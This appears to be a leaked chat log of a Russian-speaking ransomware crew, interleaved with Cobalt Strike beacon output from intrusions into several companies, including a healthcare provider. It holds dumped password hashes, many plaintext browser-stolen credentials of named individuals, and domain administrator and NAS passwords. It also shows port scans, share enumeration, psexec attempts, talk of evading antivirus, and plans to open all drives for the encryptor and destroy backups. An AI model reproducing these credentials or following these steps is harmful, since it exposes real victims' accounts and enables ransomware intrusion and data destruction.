7143 DESKTOP-M3CLUMV$ aecc192c549c84e506675e3515bd9872 4096
2137 mwood 679f896c6af8720a9ac9ca7b3fa50d25 66048
2280 kdaly 64f12cddaa88057e06a81b54e73b949b 66048
2836 PRH-2273$ f3a5088e090b552c11e13666165cf1b1 4096
7137 PRH-2790$ 6db68b8974bedd975b742610c00e9e69 4096
2810 PRH-2623$ 35fad9d1f36911e0ebcd46834252e627 4096
6681 PRH-3123$ 5ea86b4846b81644dcfac0537eec0681 4096
3307 PRH-2873$ 0b69c9eff062308d3d3c52403cefa089 4096
2116 PRH-2979$ 72b4fced4bb842a6de5fbc91a8e916fb 4096
4696 AThormodson 99e86640e8059a212fa80d8c99bfa0d2 512
6706 LRH000262$ 41b2e6741584b2f7c92a4768a2b88cde 4096
2228 tha 722dd030aca3a775fe4a3537b412dd2d 66048
1206 chartroom 7ce21f17c0aee7fb9ceba532d0546ad6 66080
2553 nhoffman cb0abaa50a8f3dc4fc24f04548a41389 66048
4657 PRH-3103$ b6bfc4ba92977ca9a9a82e442ab6a157 4096
6617 Lungs d4c31c67a8e1e9c5a901608fc053e86d 66048
5616 bsmith 64f12cddaa88057e06a81b54e73b949b 66048
2515 rlien 2d3bffbe9b944bac2416622293868061 66048
2665 dsperr 30baf37feb6e2f61e0c2ad226b7ec372 66048
4697 mtkerr e20e421380a905858cd7cca7e2334712 66048
3342 sborsgard b3255351d8dfe7cdedf3f552a49146d6 66048
3312 PRH-2874$ ddd0b075c561be1bd6107e1f8089ae48 4096
7108 jthompson cd9537fd09f00f0377c186febc42b3eb 66048
2906 arisbrudt 64f12cddaa88057e06a81b54e73b949b 66048
2326 nolson becedb42ec3c5c7f965255338be4453c 66048
3208 sberg 64f12cddaa88057e06a81b54e73b949b 66048
3096 pgorman 6b8ba5f3aae982855e5551b8c7936d53 66048
7109 rjhoyt e690e3bf09962403b980bb6b81f3df5f 66048
3071 FPSERVER$ 43e376323eadee8b16c7989c8df01359 532480
6699 jtotland 218143d40917d213ef5dd38998ee45e0 66048
2618 ituser ab310ea1a05dc32528c9e5102a26b294 66048
2675 kgerber 14a6939d98f10b267219e6374ef230cd 66048
2880 PRH-2701$ cbb0ca44170500764bbc2b2eef09026b 4096
2669 phaberer 2f7788fa03a3deed9c4b43d6204e8a85 66048
6675 PRH-3125$ dd43b97954bac2493f287d1b19162bc9 4096
3145 WSERVER3-PC$ 136a1889dbbebaf19fe659acf8737767 4096
2281 RMeichsner 64f12cddaa88057e06a81b54e73b949b 66048
5604 ELEAHSERVER$ 2db5eb12f6f902bcf78ff12f643fa6c2 532480
500 Administrator db74c9408655f77f65b01d248fa459df 66048
2666 krogahn 615f178fd1afa75283f4c023c27035af 66048
3319 PRH-2880$ 8839eda0225bac49e0725b472c16822b 4096
4612 PRH-3001$ 1b6812ece2fbe68b993ac64c3cecb0d2 4096
1202 sos bc73e083d3eb8f3d3e098010a1fd8127 66080
1240 SMA 4e426eb9d160988d2a0f2b5bc0473aa1 66080
1201 lab f52d5c82de6ecc8f7d0b1a9d5ff3672f 66080
3119 PRH-1169$ 3e159cd25b9ba4938cd24b272a0685ba 4096
3297 hdomek 64f12cddaa88057e06a81b54e73b949b 66048
2805 snordby 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2464 PRH-1133$ cff5753db280fd3402e9da745252930b 4096
7157 LRHC$ 81b9f3c594d556c0091c8deff7486dc6 2080
2502 PRH-3041$ f65e3cc24bbb1e480f967fcb22ab63d0 4096
2525 jhotvedt c98a8b1efa7a564c9247411ecfe8d8c0 66048
6668 mruegemer 115694b78a8411438f5a092847b30ebe 512
2907 PRH-2955$ 7d2fde70f0b1c3aa7729bcb564269e57 4096
4687 val 812792a1f13bb10964ed1dfeac78c64b 66048
7129 PRH-2213$ 1a34202f6f4759977ed502055043245a 4096
3045 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66048
4670 PRH-3127$ 393a0c622108d8e097268fa00b79dc30 4096
3176 ELEAHBDC$ f5edff92ccf8406f26597614a5b458ba 532480
2604 SHAREPOINT$ b994bf3a81af1e80dbc57e9b3c8c5958 4096
2311 ELBOW-102$ 7cc5cfe0d26a2c709058399aa1ee070c 4096
5607 PRH-3005$ cfbd8ef7643f720e4fb0e90e88f471e0 4096
``под соксомсюда попробуйте``
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
``````
m.lrhc.org 40.112.142.148 Windows Microsoft-IIS 10.0 Microsoft Azure Web App - Error 404
lrhc.org 52.41.140.55 Lake Region Healthcare | Lake Region Healthcare
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
sip.lrhc.org 52.112.192.139 RTC 7.0
smtp.lrhc.org 66.228.239.132
mail.lrhc.org 66.228.239.133
ftp.lrhc.org 66.228.239.137
support.lrhc.org 66.228.239.151 Apache-Coyote 1.1 Web Help Desk
patch.lrhc.org 66.228.239.157
``````
``его домен креды не катяту него сохранен вход)пробую под нельсоном зайтида пока никакпо почте как дела обстоят?теперь успокоился)``
beacon> ls C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[Tasked beacon to list files in C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[+] host called home, sent: 77 bytes
[*] Listing: C:\Users\cmelliott\AppData\Local\Microsoft\Edge\
Size Type Last Modified Name
---- ---- ------------- ----
```дайте листинг папки ежа)он хромом пользуетсянебылоя хз чем его сниматьтак у него не было ежа или был?``
10.10.220.45:445 (platform: 500 version: 5.1 name: PAULSANDERSON domain: FFMG)
```а не в каталоге браузераон ищет в vault[ ](https://mediaeveryone.com/group/lrhc-org?msg=STFrsGWwCj4KENyy6) шарп веб по моему устарел для ежаснайпермэйл не сработал?мож пароль совпадет, похоже перебирать придетсявряд ли разраб имет доступ в бэкапыэто тачка разраба какого-то`http://pdiprodweb/FocalPoint/Login.aspx`
тут у нас что?
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W
--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU
--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
```хотите хостнеймы - прописывайте локально в файле hosts имена ипне резолвит сокс хостнеймыопять?хотя вряд ли там есть бэкапсистема``
URL : https://system.netsuite.com/
```агаlol)```
URL : http://wwsql01/
Username : sa
Password : sa
``````
[*] Beginning Google Chrome extraction.
[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL: https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*
--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X
--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew
--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-
--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH
--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123
[*] Finished Google Chrome extraction.
[*] Beginning Edge extraction.
--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj
--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42
[*] Finished Edge extraction.
[Done.
``````
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57
``````
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
````https://mail.datotel.com/owa/`customercare@waterway.com Wc#2020!``http://192.168.0.10:3000`http://192.168.0.9:3000/auth/login?redirect=%2F`вы кстати нашли чего вне домена?мб снайпермэйл попробуй в почту зайти https://192.168.0.115/-нимблв набл залезли?``
BACKUPDVR.waterway.com
192.168.0.46:443
192.168.0.46:80
``надо убедиться что все нашлитут пока без движения?``
beacon> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``мб реплика откл поэтому 100% лосс анричбл смысла нетвот надо сканить с тех которые лосс на портыс некоторых 100% лоссмоя не внимательность (он с некоторы компов анричаблон `Destination host unreachable`так а в чем прикол то*``
Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.
Ping statistics for 192.168.0.119:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000
``````
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:05:54> portscan BACKUP 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on BACKUP
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:06:18> shell ping BACKUP -n 1
[*] Tasked beacon to run: ping BACKUP -n 1
[+] host called home, sent: 47 bytes
[+] received output:
Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.
Ping statistics for 192.168.0.119:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
datavault Waterway727
domainrestore Waterway727
mapusatera Gators1853
Administrator 1853Gators
veeam_admin 99Waterway
Applied Waterway99
DBunte Waterway99
gkeller Waterway76
SEnglert Waterway99!
``````
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
c9f45ab5e6cc7b11dcf9b3bce3fa64df Gators1853
ee54eb9485bf78494a7074cb7b0513a0 1853Gators
a313f6cf5fb92a96195435f9a6e4b5a9 99Waterway
debd2d79f79e305817da0ec58509d686 Waterway99
debd2d79f79e305817da0ec58509d686 Waterway99
134cee9671bb94bffdaefb6f84f5989d Waterway76
036c9df1839c6adc5e65c74fffdca10b Waterway99!
``можно вот хэшики пожалуйста?
```
datavault 594d1d0f2355dbd18bab80250cd9a1c4
domainrestore 594d1d0f2355dbd18bab80250cd9a1c4
mapusatera c9f45ab5e6cc7b11dcf9b3bce3fa64df
Administrator ee54eb9485bf78494a7074cb7b0513a0
veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
Applied debd2d79f79e305817da0ec58509d686
DBunte debd2d79f79e305817da0ec58509d686
gkeller 134cee9671bb94bffdaefb6f84f5989d
SEnglert 036c9df1839c6adc5e65c74fffdca10b
``root Waterway99!
насик с бэкапами:
192.168.0.3 Waterway 11915Wnas2179!
```
```
DA:
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
```да, подождите...) мож еще по людски из линуха потрем))угу так же поступимктрл+а > делитвот мы там тожепотерем тогда окейя думал это внутри))внизу навбар от твоего дедикааану слушай я хз как на этой байде админ-лист глянуть``
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
``я смб_логином проходил+на запись прав не было да?туда все проходили как пользаки толькодаже шары не давал посмотретьа чекни латам не получалосьу нас вилсонарте точно такой же былне смогли по нему прятинуть?естьtcnmу него 445 закрыт?отличноагакак на 3 картинкеа в папочках вот такие файликикак на 2 картинкеа в нем вот такие папочкинасикэто вы в бэкап залезли?`192.168.0.3\.\Waterway 11915Wnas2179!`а пробить пытались?и скультелнет открыт``
198.61.195.78:5948
198.61.195.78:1433
198.61.195.78:21 (220 Microsoft FTP Service)
```с этого бы надо начать)сейчас крч отсканю портытуда рдп порта не было? или 445``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 23:32:52> shell ping raxdb.waterway.com -n 1
[*] Tasked beacon to run: ping raxdb.waterway.com -n 1
[+] host called home, sent: 59 bytes
[+] received output:
Pinging raxdb.waterway.com [198.61.195.78] with 32 bytes of data:
Reply from 198.61.195.78: bytes=32 time=19ms TTL=114
Ping statistics for 198.61.195.78:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 19ms, Maximum = 19ms, Average = 19ms
```не, почему же?внешняя админка?я пытаюсь подбирать пароли с браузеров и с мимикау технарей пусто?подбираю пароль под НАС что ТЛ2 подкинултак тут у нас?``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:59:37> shell net view \\CLEBACKUP2020 /all
[*] Tasked beacon to run: net view \\CLEBACKUP2020 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 5 has occurred.
Access is denied.
``````
Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:54:41> shell net view \\MWEISSDESKTOP /all
[Tasked beacon to run: net view \\MWEISSDESKTOP /all
[+] host called home, sent: 60 bytes
[+] received output:
Shared resources at \\MWEISSDESKTOP
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Brother HL-5450DN series Print
C$ Disk Default share
IPC$ IPC Remote
print$ Disk Printer Drivers
The command completed successfully.
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:01> shell net view \\U20OFFICENEW /all
[*] Tasked beacon to run: net view \\U20OFFICENEW /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \\U20OFFICENEW
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
The command completed successfully.
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:42> shell net view \\DVRNEWBACKUP20 /all
[*] Tasked beacon to run: net view \\DVRNEWBACKUP20 /all
[+] host called home, sent: 61 bytes
[+] received output:
Shared resources at \\DVRNEWBACKUP20
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote
The command completed successfully.
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:09> shell net view \\KCNEWBACKUP2020 /all
[*] Tasked beacon to run: net view \\KCNEWBACKUP2020 /all
[+] host called home, sent: 62 bytes
[+] received output:
Shared resources at \\KCNEWBACKUP2020
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C Disk
C$ Disk Z: Default share
IPC$ IPC Remote IPC
The command completed successfully.
Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:56:34> shell net view \\WATERWAY43OFFIC /all
[Tasked beacon to run: net view \\WATERWAY43OFFIC /all
[+] host called home, sent: 62 bytes
[+] received output:
System error 53 has occurred.
The network path was not found
``````
http://192.168.0.3:5000 - NAS
NAS (nimble storage)
логин\пас Administrator\1853Gators
https://192.168.0.42:443
https://192.168.0.43:443
https://192.168.0.75:443
https://192.168.0.77:443
\\192.168.0.164 - осмотреть тачку на предмет важной инфы
неизвестные юникс сервера (есхи?)
192.168.0.10:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
192.168.0.9:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
``````
192.168.0.159:445 (platform: 500 version: 6.1 name: MWEISSDESKTOP domain: WATERWAY)
192.168.20.2:445 (platform: 500 version: 10.0 name: U20OFFICENEW domain: WATERWAY)
192.168.42.2:445 (platform: 500 version: 10.0 name: DVRNEWBACKUP20 domain: WATERWAY)
192.168.30.2:445 (platform: 500 version: 10.0 name: KCNEWBACKUP2020 domain: WATERWAY)
192.168.43.2:445 (platform: 500 version: 10.0 name: WATERWAY43OFFIC domain: WATERWAY)
```user9user8user4по сути все тачки что я вижу (те что а АД) могу к ним законектиться или притянуть, но такое чувство что то упускаю или не в том напровлении ищуесли брать полностью то я
не нашёл сферу (хочть что нибудь куда я смогу подключиться)
не нашёл как отключить АВ
и не нашёл облачные бэкапы (stalin сказал что у них они облачные, что такое он упоминал)а в чем затык?это пользаки Hyper-V`WATERWAY\blauer 11915Admin2179!` только его клеры нашёл``
mapusatera
Applied
djarden
blauer
```
проверял этих пользаковтут у нас что?спалили значитдо этого кмд запускалсяа как у тебя до этого тпш работала?окейвыдам заменудавай скиптнеэтот стоит пробовать?``
Fix 3. Stop the process of the related .dll
```да его и нету дажемб его отключить просто?таскну типа самое безобидное и выбралкоторая и так в говноглавное не похерь им систему)хм``
Press Win + R on your keyboard
Type in taskschd.msc and press Enter
In the Task Scheduler click on Task Scheduler Library once
Right-click on the BackgroundContainer task and select Delete
```ну там fix2какой?думаю второй вариант попробоватьhttps://ugetfix.com/ask/how-to-fix-the-specified-module-could-not-be-found-error-on-windows/при запуске хрома даже эта ошибка лезетахахклучше с ехеили без ехечерез ран же писать нужно rundll32.exe?угукwin r > rundll32 ...я тебе соберу ехе и длл, начни с длла мб через ран запустить рандл?давай шелкод я соберуче мне самому собрать или ты через крутой криптор?+не забудь только качать через инкогнито и т дно давай попробуемехе нагрузка грязнее будетхотя и смысл, если шелы не работают...и по ссылке через хром качнуть по рдпзахостить ее для загрузки в кобеможет exe нагрузку в кобу попробовать?причём temp.dll там лежит[ ](https://mediaeveryone.com/group/healthcare-com?msg=rQzLkTcw6J6FGXwuD) и с этим такжекогда вставляю нагрузку тпш в ран - та же ошибкаили win r > cmd /c echo 123 > C:\file.namewin r > нагрузка тпшпопробуй не запускать гуишный вариантwin r > cmd
win r > powershellа как ты его используешь?через ран точно такжетак тоже должно найтиможешь в поиске написать runокейща перебинд сделаюу меня на win R поверх рдп вылазит этооткроется меню runпопробуй win+rпробовал просто по ярлыку из пуска, созданием ярлыкак запускаешь?при запуске повершелла то же самоепри запуске кмд по рдпСессий так и нет ?как там сессиями?@tl2 может ты че скажешь?@tl1 Есть хорошие новости?еще не знаю@tl1 Сессии будут?нашумели скорее всегои не видно домен...
```
beacon> shell net user nddevbernst /dom
[*] Tasked beacon to run: net user nddevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.
System error 1355 has occurred.
The specified domain either does not exist or could not be contacted.
``сегодня почти все компы оффрелей тоже ничего далпривет
веб сервисов не нашли, скуля тоже не видно
пустили релей и пошли домой)птhiчто по итогу вчера сделали?всем приветлибо ан логин либо на ремув экшн``
странно конечно что она внутри сети но с 2фа
```
стандартная практика всех ЕДР систем, форсом 2фа по умолчаниюна мыло?а 2фа куда?странно конечно что она внутри сети но с 2фамне помнится 2фамелькала кажисьа админка от кассеи найдена вроде да?админка не найдена7билд потрет 100%нет, у нас тут касея которая никак нас не реагируету вас тут с ав проблемы да?ага, оригинал был https://github.com/djhohnstein/SharpSharesсами накатали софт что ли?да нету еще гита, тестим покаможно ориг название или ссылку на гити потоков сколько скажешьесть такой, шарпшарснг может запускать батник на каждый отработаный хоста это реально быстро будет? сеть достаточно жирная, псек не быстро работает, тут бы какой нибудь мультри тред тул?на все буквы англ алфтогда батч который шарит диск с меткой на буквы метки + $)))но твой вариант мне нравится большеда с моей точки зрения так просто правильнее поступатьв батчеа зачем?а я думал ты цикл по доступным дискам замутил)чтобы не отбираьт "где какой "там просто прописаны все возможные логические дискине имется
я не сохранял ибо он очень тупойпсекзеком по всему домену?)а на этот вопрос я даже отвечать не буду)батник имется?но если дополнительно расшарить исключен вариант проебать что в процесевцелом это тоже самоемапим мы их для приоритетностилокер работает в сетизачем?так их потом все равно мапить на метку надо?на абсолютный доступрасшарить ВСЕ диски на ВСЕХ пкне совсемулавливаете?это когда раскидываем по ВСЕМ серверам батник который открывает ВСЕМ все шарыкоторая покрытие повышает нихуево и скоростькстати
есть еще одна классная штукада
давайте попробуемчтобы повысить процент закрытой "площади" по сети;)предварительно включить все пк в сетиWake On Lanнеа, к @tl2что за вол?это к нам вопрос?кстати эту сеть будем прибивать с WOL?лезут на свет ага[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=7cqrQukLANZFKucaJ) боже, они размножаются
бегитену после пинга через SharpSharesNG их стало больше)пранк серверамиэто пранк)71 сервак из 53 жив?)это как?``
53 сервера (71 живой)
``````
WEB4: 89.0.0.158
WEB4: 89.0.0.157
WEB4: 89.0.0.156
WEB4: 89.0.0.155
WEB4: 89.0.0.154
WEB4: 89.0.0.153
WEB4: 89.0.0.152
WEB4: 89.0.0.151
WEB4: 89.0.0.150
WEB4: 89.0.0.66
WEB4: 65.162.42.254
WEB4: 65.162.42.252
WEB4: 65.162.42.251
WEB4: 65.162.42.250
WEB4: 65.162.42.242
WEB4: 65.162.42.197
``````
winona.rtpco.local
118 тачек по ад
64 армов на винде (10 живых)
53 сервера (71 живой)
```сейчас все перепенгую по новойчто у нас тут перед закрытием?*иа забиливсе
забыли про него@tl2 вроде это рудимент[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=FMtieCLZo3Sm43oj4) воттот вышеэто другойнеее`RichmondDC2.us.alloypolymers.com````
beacon> shell dnscmd us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd us.alloypolymers.com /info
[+] host called home, sent: 64 bytes
[+] received output:
Query result:
Server info
server name = RichmondDC2.us.alloypolymers.com
version = 25800306 (6.3 build 9600)
DS container = cn=MicrosoftDNS,cn=System,DC=us,DC=alloypolymers,DC=com
forest name = us.alloypolymers.com
domain name = us.alloypolymers.com
builtin forest partition = ForestDnsZones.us.alloypolymers.com
builtin domain partition = DomainDnsZones.us.alloypolymers.com
read only DC = 0
last scavenge cycle = not since restart (0)
Configuration:
dwLogLevel = 000000
dwDebugLevel = 00000000
dwRpcProtocol = 00000005
dwNameCheckFlag = 00000002
cAddressAnswerLimit = 0
dwRecursionRetry = 3
dwRecursionTimeout = 8
dwDsPollingInterval = 180
Configuration Flags:
fBootMethod = 3
fAdminConfigured = 1
fAllowUpdate = 1
fDsAvailable = 1
fAutoReverseZones = 1
fAutoCacheUpdate = 0
fSlave = 0
fNoRecursion = 0
fRoundRobin = 1
fStrictFileParsing = 0
fLooseWildcarding = 0
fBindSecondaries = 0
fWriteAuthorityNs = 0
fLocalNetPriority = 1
Aging Configuration:
ScavengingInterval = 0
DefaultAgingState = 1
DefaultRefreshInterval = 168
DefaultNoRefreshInterval = 168
ServerAddresses:
Ptr = 00000057578A8210
MaxCount = 2
AddrCount = 2
Addr[0] => af=23, salen=28, [sub=0, flag=000000] p=13568, addr=fe80::1ea:20ef:8dbe:2e0
Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=10.1.247
ListenAddresses:
NULL IP Array.
Forwarders:
Ptr = 00000057578A8C40
MaxCount = 4
AddrCount = 4
Addr[0] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=64.83.1.10
Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=64.83.0.10
Addr[2] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=209.218.44.2
Addr[3] => af=2, hall=16, [sub=0, flag=00000000] p=13568, addr=209.125.133.6
forward timeout = 3
slave = 0
Command completed successfully.
``````
beacon> shell dnscmd gaproc.us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd gaproc.us.alloypolymers.com /info
[+] host called home, sent: 71 bytes
[+] received output:
Info query failed
status = 1722 (0x000006ba)
Command failed: RPC_S_SERVER_UNAVAILABLE 1722 0x6BA
``мб он про dnscmd?может то я тыкал?Переснял сеабел``
Entry : gaproc.us.alloypolymers.com
Name : gaproc.us.alloypolymers.com
Data : 192.168.1.121
Entry: gaproc
Name : gaproc.us.alloypolymers.com
Data : 192.168.1.121
```в днс записях домен контроллеров тоже нету если его - скипаемя думаю даесли больше никак не проверить то скипаем его тогдачет ничего там не видно по ад его нетмб реально пережиток``
Teemo[WINDC2]SYSTEM */4284|20Dec25 01:04:37> portscan 192.168.3.0/24 1-10000
[Tasked beacon to scan ports 1-10000 on 192.168.3.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``оставим такугу``
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:57:22> remote-exec psexec 89.0.10.104 tasklist
[Tasked beacon to run 'tasklist' on 89.0.10.104 via Service Control Manager
[+] host called home, sent: 1998 bytes
[-] Could not open service control manager on 89.0.10.104: 1728
``лишний раз шуметь не будемдоступы естьтам вроде бэкапы видныхотя хер с нима псек``
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:56:06> shell tasklist /v /s 89.0.10.104
[Tasked beacon to run: tasklist /v /s 89.0.10.104
[+] host called home, sent: 57 bytes
[+] received output:
ERROR: The RPC server is unavailable.
``сделайте сюда тоже скан на /24``
--- Chromium Credential (User: dch) ---
URL : http://192.168.3.254:5000/webman/login.cgi
Username : admin
Password : 11Dennis
```
такая хрень попадалась в браузере, через проксу пробовал зайти вообще не грузити еще @user7 а проверь нас tasklist /v /sпробегитесь по нимданые же выкачивали?нет, я уделял особое внимание линкам с доманом и ipвстречали туда пути?ребят, всю инфу что выгружали с тачек технареймне так же кажетсяблядство
может он ваще рудиментарный какой-то
пережиток прошлых веков``
[*] Tasked beacon to scan ports 135,139,445,80,443,8080,1433 on 192.168.1.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```да
давайте запортсканиможет пинг фильтроваться...и внц еще укажите + рдпна 135,139,445, веб порты и скульСо всехпроверьте /24``
Teemo[WINDC2]SYSTEM */4284|20Dec24 21:36:28> shell ping gaproc.us.alloypolymers.com -n 1
[*] Tasked beacon to run: ping gaproc.us.alloypolymers.com -n 1
[+] host called home, sent: 68 bytes
[+] received output:
Pinging gaproc.us.alloypolymers.com [192.168.1.121] with 32 bytes of data:
Request timed out.
Ping statistics for 192.168.1.121:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```а ты его с US пинговал?кхмотсканьте диапНе пингуеться(лол))
ну серьезно, где ты его заметил?ипак локального диапазона?Карты ТАРО указали путь)))он пингуется?
диап отсканирован куда он пингуется?а откуда по нему инфа?Его нет в трастах вообщевроде не в АДон в карантине?Есть еще траст к которому нет доступану вцелом поебатьхм
занятноЭто нет гир на линухенасколько я понимаю это НАС на урезанной винде?файлы свежиеШкола Сни северного)красавчикишикарно ребят)ну вот и славнолокер пройдется по нейЗапись естьесли работает - все отличнопроверьте запись в эту дирудайте скрин или листинг диры с размерами файловНе всегда на них диски расшарены, там в настройках можно просто выбрать папку для того что б от куда нужно клать бекапыминутучитаюя тутгуру приди@tl2призываем гуру @tl2там должны быть диски расшареныа хотя мб рано радуемсячестно сам удивлен)скасибо что сказал посмотреть, так бы ещё неделю бы ебались с ней )@tl2 посмотри на этоскорее всего у нее был доступтокен чей?под какой учеткой замапили?ну вы даетет е у вас все это время был доступ?хотя доступ и так былбля)в том то и дело что никак не сделали, ты сам сказал посмотреть нет вив а до этого момента мы искали креды от веб мордыкак?)вы сделали это?```
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:40> shell net use * \\89.0.10.104\Documents
[Tasked beacon to run: net use * \\89.0.10.104\Documents
[+] host called home, sent: 64 bytes
[+] received output:
Drive Z: is now connected to \\89.0.10.104\Documents.
The command completed successfully.
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:53> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
